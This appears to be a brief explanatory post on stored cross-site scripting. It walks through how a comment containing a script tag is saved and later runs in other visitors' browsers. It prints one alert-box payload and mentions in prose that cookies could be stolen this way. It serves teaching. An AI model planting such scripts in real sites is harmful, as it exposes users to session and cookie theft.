Comprehensive example of Cross Site Scripting(XSS) attack.
Let’s say a web page has a comment section and users can leave comment on the page.
A bad user leave comment on the site and it’s text is <script> alert('You're hacked') </script>
It’s stored in the server database. When another user visit the page, the text is sent from the server to the browser.
Browser recognizes the text as a script, not a DOM element. So it is executed on the browser and shows alert dialog, instead of display text.
Instead of simple alert script, bad user can insert a script to get cookie data and send to him using Ajax request.
Here is a comprehensive and well understood blog about Cross Site Scripting attack and how to prevent it.
https://excess-xss.com/
